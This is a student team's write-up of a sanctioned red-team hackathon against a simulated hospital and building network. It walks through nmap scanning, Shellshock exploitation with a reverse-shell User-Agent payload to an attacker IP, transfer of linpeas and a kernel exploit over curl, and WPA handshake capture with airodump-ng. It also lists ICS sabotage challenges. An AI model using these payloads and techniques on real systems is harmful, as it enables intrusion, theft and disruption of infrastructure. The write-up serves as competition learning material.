🏢Hack The Building 2.0 Preliminary : Hospital Edition 2023

Our experience participating in the Hack The Building 2.0 Hospital Edition Preliminary.

About

Preliminary event force-on-force style hackathon(Blue vs. Red Team) against other Universities and whoever was within the top of the leaderboard earned a spot to attend the in person event. Our small team of about 3-4 participated as a red team in this event. Being our first time participating in such a competition we did not qualify for the in person event , but this was really fun !

Initial Foothold / Prepositioning

Scanning and Enumeration

We connected to the network using an openvpn file and started off with an initial nmap scan scanning for any open web ports within the network.

sudo nmap 172.19.99.0/24 -p80,443 -sV -T5 --min-rate 1000

We did find some hosts, but most of it was "garbage" and not useful, so we copied and pasted the nmap output into a txt file "garbage" and then sorted through the output, removing anything unecessary.

nano garbage

// Sequence of commands used for filtering
cat garbage | grep -v tcpwrapped
cat garbage | grep -v tcpwrapped | sort
cat garbage | grep -v tcpwrapped | sort | grep -v "SERVICE VERSION"
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE"
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for "
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for " | grep -v "Host is up "
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for " | grep -v "Host is up " | uniq
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for " | grep -v "Host is up " | uniq > information

Vulnerability Assessment

After filtering though the Nmap output, we did find that 172.19.99.141 was running apache on port 80. After going to http://172.19.99.141 we see that the page says "What a shockingly boring page", could this be a hint at a Shellshock vulnerability???

We tried using this Nmap script to verify if the vulnerability existed on the web app, and it does exist!

sudo nmap -sV -p80 --script=http-shellshock 172.19.99.141

Shellshock Exploitation

1. Generate a Reverse Shell

• Generate a revshell at https://revshells.com

• Attacker IP: 10.73.1.44

• Port: 5555

• Listener type: nc -lvnp 5555

  • set advanced to on

• Reverse, Bash -i

  • /bin/bash -i >& /dev/tcp/10.73.1.144/5555 0>&1

  • shell: /bin/bash

  • encoding: none

2. Setup a nc listener to catch the revshell

nc -lvnp 5555

3. Inspect > Network(to modify the User-Agent HTTP Request header)

• Edit the User-Agent http request header

User-Agent:() { : ; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.73.1.144/5555 0>&1'

• Send a New Request with the modified User-Agent header and view the Response

4. Profit $$$

www-data@dev-web:~$ cat /etc/passwd 

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/bash
man:x:6:12:man:/var/cache/man:/bin/false
lp:x:7:7:lp:/var/spool/lpd:/bin/false
mail:x:8:8:mail:/var/mail:/bin/false
news:x:9:9:news:/var/spool/news:/bin/false
uucp:x:10:10:uucp:/var/spool/uucp:/bin/false
proxy:x:13:13:proxy:/bin:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/false
list:x:38:38:Mailing List Manager:/var/list:/bin/false
irc:x:39:39:ircd:/var/run/ircd:/bin/false
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
libuuid:x:100:101::/var/lib/libuuid:/bin/false
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
rfabian:x:1000:1000:rfabian,,,:/home/rfabian:/bin/bash
sysadmin:x:1001:1001:,,,:/home/sysadmin:/bin/bash
ansible:x:1002:1002::/home/ansible:/bin/bash

Privilege Escalation

We got a low privileged user shell, now we can perform some local enumeration and see what can be exploited to escalate our privileges to root.

ls
    index.cgi
whoami
    www-data

In this case we used linpeas to see if we can find any privilege escalation vectors.

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

Transfer to the target by hosting it on a python web server, and using curl on the compromised machine to download it.

python3 -m http.server 80

cd /tmp
ls -la
curl http://10.73.1.144/linpeas.sh > linpeas.sh
sh linpeas.sh > linpeasoutput

Here we have some interesting Linpeas output.

OS: Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: dev-web
Writable folder: /run/shm

It looks like we have a writable folder /run/shm, but here we tried running a kernel exploit instead.

We tried compiling the kernel exploit on our attack host and then transferring it to the compromised machine using the same method we used to transfer linpeas. Unfortunately, the kernel exploit did not work.

(Attack Host)
searchsploit 41995
searchsploit -m 41995

ozzy@kali:~$ gcc 41995.c 

ozzy@kali:~$ mv a.out 41995

python -m http.server 80

(Compromised Machine)
curl http://10.73.1.144/41995 > 41995

www-data@dev-web:/tmp$ chmod +x 41995
www-data@dev-web:/tmp$ ./41995
bash: ./41995: cannot execute binary file
www-data@dev-web:/tmp$  exit
^C

This being the second to last day of the preliminary we decided to take a breather and try again tomorrow , the last day...

Wi-Fi Exploitation

The next day, it was announced that for the teams that were unable to establish persistence, they were automatically given a jump host(as root) to speed things up a bit.

So with our already dedicated jump host, the next step was to perform Wi-Fi operations and try to exploit any of the Wi-Fi networks that were physically near the jumphost/compromised host.

Once we use ssh to access our jump host we can continue onto Wireless Compromise and Wireless sniffing.

iwconfig
	lo        no wireless extensions.

	eth0      no wireless extensions.

	wlan0     IEEE 802.11  ESSID:off/any  
        	  Mode:Managed  Access Point: Not-Associated   Tx-Power=31 dBm   
        	  Retry short limit:7   RTS thr:off   Fragment thr:off
         	 Power Management:on

airmon-ng check kill
	(kills processes that interfere)

airmon-ng start wlan0
iwconfig
	- check if wlan0mon is active and in monitor mode

When trying to compromise Wireless networks here is a list of some things we might want to consider when monitoring Wireless networks:

• BSSID = MAC address of the Access Point (AP)

• CH = channel 1-14 (1,6, and 11 are big ones)

• PWR = power level (closer to 0 = closer to device)

• Beacons (data, 0 = not connected to the internet)

• ENC (e.g. WPA2)

• AUTH (e.g. PSK)

• ESSID = network name, length:21 could be a hidden network

Here, given the instructions from the white team, we had to choose one of the networks we wanted to wirelessly deauth to capture its WPA handshake, which we would then attempt to crack offline to ultimately gain access to the Wi-Fi network.

airodump-ng wlan0mon
	(choose a network)
	CTRL + C
	
airodump-ng -c 6 --bssid <BSSIDofAP> -w <HTB.pcap> wlan0mon

Once the WPA handshake was captured, we only had to show a proof of concept and not actually try to crack the password. Once proof was given, we were given the actual password to connect with and then we could begin to enumerate any active and vulnerable ICS systems connected to that Wi-Fi network.

Note: There were several Wi-Fi networks, which means each Wi-Fi network had different ICS systems connected to it.

ICS Enumeration & The End...

So far we have:

1. Successfully exploited a web server on 172.19.99.0/24 to gain a foothold

2. Performed Wi-Fi exploitation from the foothold on any nearby Wi-Fi networks

3. Connect to the nearby Wi-Fi network

After successfully exploiting and connecting to the Wi-Fi network, we can go back to the enumeration phase and enumerate any host on that network, in this case any Industrial Control Systems(ICS) that we may be able to mess around with and accomplish any objectives that we have been assigned.

We were able to enumerate one of the ICS that we were tasked to mess around with and cause chaos(forgot to take screenshots of the nmap scans), but at this point we ran out of time and we were unable to exploit any of the ICS :(

Just to get an idea of what some of the challenges were like, they included:

• Take control of systems controlling a lake, and then try to make the lake flood

• Disable a power grid for a complete "lights out"

• Disable sewage systems

• Turn on a ferris wheel

• Shutoff camera systems

• Disable crane operations

• Manipulate and disrupt a conveyor belt system

Overall, this competition was fun and a great learning experience, hopefully UNG can qualify for Hack The Building 3.0 whenever it is announced!